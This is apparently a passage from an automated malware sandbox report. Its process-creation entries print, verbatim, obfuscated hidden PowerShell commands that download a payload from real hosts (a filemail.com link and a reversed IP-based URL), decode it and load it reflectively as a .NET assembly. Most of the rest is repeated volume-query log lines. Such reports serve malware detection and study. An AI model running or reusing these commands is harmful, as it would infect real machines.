uzyg0qw1hbnrpz2ftzw50zsk7neftzgvzzw1tywrlaxjhcia9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwinkydsev06okxvywqoneftbwfybw9yaxphcik7neftcg9ljysndglmawnhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qocycrj0lxvkfjcycrj0lxkts0qw0nkydwb2v0awzpy2fylkludm9rzsg0qw1udwxslcbakhnjv3r4dc5wr0zsrs8zndmxlzkyljmyms41ndiumjcxly86chr0ahnjvywgc0lxneftzgunkydzdw5pzmljyxjzsvcsihnjvzrbbwrlc3vuawzpy2fyc0lxlcbzsvc0qw1kzxn1bmlmawnhcnnjvywgc0lxyxnwbmv0x2nvbxbpbgvyc0lxlcbzsvc0jysnqw1kzxn1bmlmawnhcnnjvywgc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyscrj3jzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxmxnjvyxzsscrj1c0qw1kzxn1bmlmawnhcnnjvykpoycpic1jukvqbefjzsaow2noyvjdntirw2noyvjdnjurw2noyvjdmta5ksxby2hhul0zniaty1jfugxby2ugj3njvycsw2noyvjdmzkgic1jukvqbefjzshby2hhul04mytby2hhul02ostby2hhul01mcksw2noyvjdmti0ksb8icyoicrftny6q29tc3bfy1s0ldi0ldi1xs1kb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('4amochavilha = siwhttps://310'+'5.filemail.com/api/file/get?filekey=shtph'+'bcpx8o'+'-lotcqhlg6_0x'+'cy-xl4tnxlavbq95-dv'+'itk5car'+'andqjbb3mexfwqzkmtxg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c siw;4amtrichismo = new-object system.net.webclient;4amlinfotomia = '+'4amtrichismo.downloaddata(4amo'+'chavilha);4ampresum'+'ptu'+'oso = [system.text.encoding]::utf8.getstring(4'+'amlinfotom'+'ia);4amnitidular = siw<<ba'+'se64_start>>siw;4amobvolvido = siw'+'<<base6'+'4_end>>siw;4amlogogrifo = 4ampr'+'esumptuoso.indexof(4amniti'+'dular'+');4amtolhido = 4ampresumptuoso.indexof(4amo'+'bvolvido);4amlogogrifo -ge 0 -and 4amtolhido -gt 4amlogogrifo;4amlogogrifo += 4amnitidular.leng'+'th;4amvindita = 4amtolhido - 4amlogogrifo;4am'+'figa = 4ampresumptuoso.substring(4amlogogrifo, 4amvindita);4amantigamente = -join (4amfiga.to'+'chararra'+'y() s'+'e2 foreach-obje'+'ct { 4am_ })[-1..-(4amfiga.length)];4amma'+'rmor'+'izar'+' = ['+'system.convert]::frombase64string(4amantigamente);4amdesemmadeirar = [system.reflection.assemb'+'ly]::load(4ammarmorizar);4ampoe'+'tificar = [dnlib.io.home].getmethod(s'+'iwvais'+'iw);4am'+'poetificar.invoke(4amnull, @(siwtxt.vgfre/3431/92.321.542.271//:ptthsiw, siw4amde'+'sunificarsiw, siw4amdesunificarsiw, siw4amdesunificarsiw, siwaspnet_compilersiw, siw4'+'amdesunificarsiw, siw4amdesunificarsiw,siw4amdesunifica'+'rsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw1siw,si'+'w4amdesunificarsiw));') -creplace ([char]52+[char]65+[char]109),[char]36 -creplace 'siw',[char]39 -creplace([char]83+[char]69+[char]50),[char]124) | &( $env:comspec[4,24,25]-join'')"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnneftb2noyxzpbghhid0gc0lxahr0chm6ly8zmtankyc1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsccrj2jdufg4bycrjy1st3rdcuhmrzzfmhgnkyddes14bdr0bnhsqvziutk1lwr2jysnavrlnwnbuicrj2fozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192ascrj2q9ztaxjysnmdk2mzhjowjmyjk1nze3mzi1mzenkyczmdlinwzmn2mgc0lxozrbbxryawnoaxntbya9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7neftbgluzm90b21pysa9iccrjzrbbxryawnoaxntby5eb3dubg9hzerhdgeoneftbycrj2noyxzpbghhkts0qw1wcmvzdw0nkydwdhunkydvc28gpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzyg0jysnqw1saw5mb3rvbscrj2lhkts0qw1uaxrpzhvsyxigpsbzsvc8pejbjysnu0u2nf9tvefsvd4+c0lxozrbbw9idm9sdmlkbya9ihnjvycrjzw8qkftrtynkyc0x0vord4+c0lxozrbbwxvz29ncmlmbya9idrbbxbyjysnzxn1bxb0dw9zby5jbmrlee9mkdrbbw5pdgknkydkdwxhcicrjyk7neftdg9saglkbya9idrbbxbyzxn1bxb0dw9zby5jbmrlee9mkdrbbw8nkydidm9sdmlkbyk7neftbg9nb2dyawzvic1nzsawic1hbmqgneftdg9saglkbyatz3qgneftbg9nb2dyawzvozrbbwxvz29ncmlmbyarpsa0qw1uaxrpzhvsyxiutgvuzycrj3roozrbbxzpbmrpdgegpsa0qw10b2xoawrvic0gneftbg9nb2dyawzvozrbbscrj2zpz2egpsa0qw1wcmvzdw1wdhvvc28uu3vic3ryaw5nkdrbbwxvz29ncmlmbywgneftdmluzgl0ysk7neftyw50awdhbwvudgugpsatam9pbiaoneftzmlnys5ubycrj0noyxjbcnjhjysnesgpifmnkydfmibgb3jfywnolu9iamunkydjdcb7idrbbv8gfslblteuli0oneftzmlnys5mzw5ndggpxts0qw1tyscrj3jtb3inkydpemfyjysnid0gwycrj1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyg0qw1hbnrpz2ftzw50zsk7neftzgvzzw1tywrlaxjhcia9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwinkydsev06okxvywqoneftbwfybw9yaxphcik7neftcg9ljysndglmawnhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qocycrj0lxvkfjcycrj0lxkts0qw0nkydwb2v0awzpy2fylkludm9rzsg0qw1udwxslcbakhnjv3r4dc5wr0zsrs8zndmxlzkyljmyms41ndiumjcxly86chr0ahnjvywgc0lxneftzgunkydzdw5pzmljyxjzsvcsihnjvzrbbwrlc3vuawzpy2fyc0lxlcbzsvc0qw1kzxn1bmlmawnhcnnjvywgc0lxyxnwbmv0x2nvbxbpbgvyc0lxlcbzsvc0jysnqw1kzxn1bmlmawnhcnnjvywgc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyscrj3jzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxmxnjvyxzsscrj1c0qw1kzxn1bmlmawnhcnnjvykpoycpic1jukvqbefjzsaow2noyvjdntirw2noyvjdnjurw2noyvjdmta5ksxby2hhul0zniaty1jfugxby2ugj3njvycsw2noyvjdmzkgic1jukvqbefjzshby2hhul04mytby2hhul02ostby2hhul01mcksw2noyvjdmti0ksb8icyoicrftny6q29tc3bfy1s0ldi0ldi1xs1kb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('4amochavilha = siwhttps://310'+'5.filemail.com/api/file/get?filekey=shtph'+'bcpx8o'+'-lotcqhlg6_0x'+'cy-xl4tnxlavbq95-dv'+'itk5car'+'andqjbb3mexfwqzkmtxg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c siw;4amtrichismo = new-object system.net.webclient;4amlinfotomia = '+'4amtrichismo.downloaddata(4amo'+'chavilha);4ampresum'+'ptu'+'oso = [system.text.encoding]::utf8.getstring(4'+'amlinfotom'+'ia);4amnitidular = siw<<ba'+'se64_start>>siw;4amobvolvido = siw'+'<<base6'+'4_end>>siw;4amlogogrifo = 4ampr'+'esumptuoso.indexof(4amniti'+'dular'+');4amtolhido = 4ampresumptuoso.indexof(4amo'+'bvolvido);4amlogogrifo -ge 0 -and 4amtolhido -gt 4amlogogrifo;4amlogogrifo += 4amnitidular.leng'+'th;4amvindita = 4amtolhido - 4amlogogrifo;4am'+'figa = 4ampresumptuoso.substring(4amlogogrifo, 4amvindita);4amantigamente = -join (4amfiga.to'+'chararra'+'y() s'+'e2 foreach-obje'+'ct { 4am_ })[-1..-(4amfiga.length)];4amma'+'rmor'+'izar'+' = ['+'system.convert]::frombase64string(4amantigamente);4amdesemmadeirar = [system.reflection.assemb'+'ly]::load(4ammarmorizar);4ampoe'+'tificar = [dnlib.io.home].getmethod(s'+'iwvais'+'iw);4am'+'poetificar.invoke(4amnull, @(siwtxt.vgfre/3431/92.321.542.271//:ptthsiw, siw4amde'+'sunificarsiw, siw4amdesunificarsiw, siw4amdesunificarsiw, siwaspnet_compilersiw, siw4'+'amdesunificarsiw, siw4amdesunificarsiw,siw4amdesunifica'+'rsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw1siw,si'+'w4amdesunificarsiw));') -creplace ([char]52+[char]65+[char]109),[char]36 -creplace 'siw',[char]39 -creplace([char]83+[char]69+[char]50),[char]124) | &( $env:comspec[4,24,25]-join'')"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
